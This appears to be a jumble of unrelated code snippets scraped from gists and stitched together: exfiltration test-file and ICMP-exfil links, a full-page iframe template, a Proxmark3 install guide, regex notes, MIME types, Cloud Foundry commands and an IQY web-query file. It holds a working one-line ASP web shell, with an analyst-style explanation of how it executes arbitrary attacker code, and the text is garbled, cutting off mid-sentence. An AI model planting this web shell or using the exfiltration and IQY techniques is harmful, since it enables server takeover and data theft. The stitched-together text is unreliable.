fsutil file createnew exfil.txt 6500000
(6.5mb)
https://github.com/api0cradle/Powershell-ICMP/blob/master/Powershell-ICMP-Sender.ps1
<html> | |
<head></head> | |
<body style="margin:0px;padding:0px;overflow:hidden"> | |
<iframe src="http://www.youraddress.com" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe> | |
</body> | |
</html> |
<%execute request(chr(42))%> | |
Table 2: “Showimg.asp” Web Shell Script | |
ASP uses Microsoft Visual Basic (VBScript) as its implementation language. The code above uses the chr() function to convert an integer into a character, which is then passed as an argument to the ASP Request() object. | |
The Request() object will search the Query String for any keys matching the input. In our case, the code is equivalent to Request.QueryString(‘*’). The request object will look for chr(42) which is an asterisk (*), returning whatever is passed to it in a HTTP GET or POST. | |
Next, the Execute() function will execute any value returned by the lookup. Effectively, an attacker can form a request that will execute any VBScript code. As you might imagine, this is a powerful capability. For example, this code can perform any of the following actions: | |
As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello W |
Install | |
1. Install homebrew if you haven't yet already done so: http://brew.sh/ | |
2. Tap this repo: `brew tap proxmark/proxmark3` | |
3. Install Proxmark3: | |
brew install proxmark3 -- for stable release | |
brew install --HEAD proxmark3 -- for latest non-stable from GitHub (use this if previous command fails) | |
Usage | |
Proxmark3 will be installed in `/usr/local/bin/proxmark3` |
Misc Regex | |
--------------------- | |
Replace all lines ending in $ | |
.*\$$ | |
Replace all lines ending in | | |
.*\|$ | |
Replace all lines NOT containing : | |
^[^:]*$ | |
Misc cut |
fsutil file createnew exfil.txt 6500000
(6.5mb)
https://github.com/api0cradle/Powershell-ICMP/blob/master/Powershell-ICMP-Sender.ps1
application/vnd.hzn-3d-crossword | |
video/3gpp | |
video/3gpp2 | |
application/vnd.mseq | |
application/vnd.3m.post-it-notes | |
application/vnd.3gpp.pic-bw-large | |
application/vnd.3gpp.pic-bw-small | |
application/vnd.3gpp.pic-bw-var | |
application/vnd.3gpp2.tcap | |
application/x-7z-compressed |
Use the CF cli https://docs.cloudfoundry.org/cf-cli/install-go-cli.html
cf login
cf marketplace
cf spaces
cf domains
cf org <org name>
cf org-users
I hereby claim:
To claim this, I am signing this object:
WEB | |
1 | |
https://ringzer0team.com/IQY | |
Selection=EntirePage | |
Formatting=RTF | |
PreFormattedTextToColumns=True | |
ConsecutiveDelimitersAsOne=True | |
SingleBlockTextImport=False | |
DisableDateRecognition=False |